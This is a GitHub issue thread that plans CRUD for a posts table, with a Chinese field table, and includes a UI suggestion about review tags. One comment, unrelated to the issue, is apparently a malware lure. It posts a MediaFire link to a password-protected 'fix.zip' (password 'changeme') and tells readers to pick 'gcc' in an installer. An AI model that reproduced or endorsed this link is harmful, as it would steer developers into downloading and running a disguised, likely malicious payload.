### ISSUE TITLE
CRUD_評論欄位-文章models

### ISSUE THREAD

**Issue by kait-wu** [astrocamp/17th-WorkNet#3]
建立posts表CRUD

| 欄位名稱    | 資料型態               | 描述                      |
|-------------|------------------------|---------------------------|
| `id`        | Primary Key           |             |
| `title`     | CharField             | 文章標題                   |
| `content`   | TextField            | 文章內容                   |
| `users_id` | Foreign Key  | 發文者的id (連結到 Users 表) |
| `created_at`| DateTimeField         | 文章創建日期                |
| `updated_at`| DateTimeField         | 文章更新時間                |
| `deleted_at`| DateTimeField         | 文章刪除時間                |

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kkrystalll** [comment]
優化建議：（優化代表不一定要做，如果覺得可以做，就另外開票有空處理這樣）

我看你們復刻的網站，他會有優點缺點那種，覺得如果有的話也會是貼心的設計
<img width="652" alt="截圖 2024-08-28 晚上7 06 25" src="https://github.com/user-attachments/assets/f1e282c6-66c4-49ed-b629-d94bcd7cd3e3">
參考蝦皮評論（其實嚴格說起來也滿像 tag）
![IMG_BEEFCABB5AD0-1](https://github.com/user-attachments/assets/bd96a15c-937c-49da-b943-d2562870ca3f)
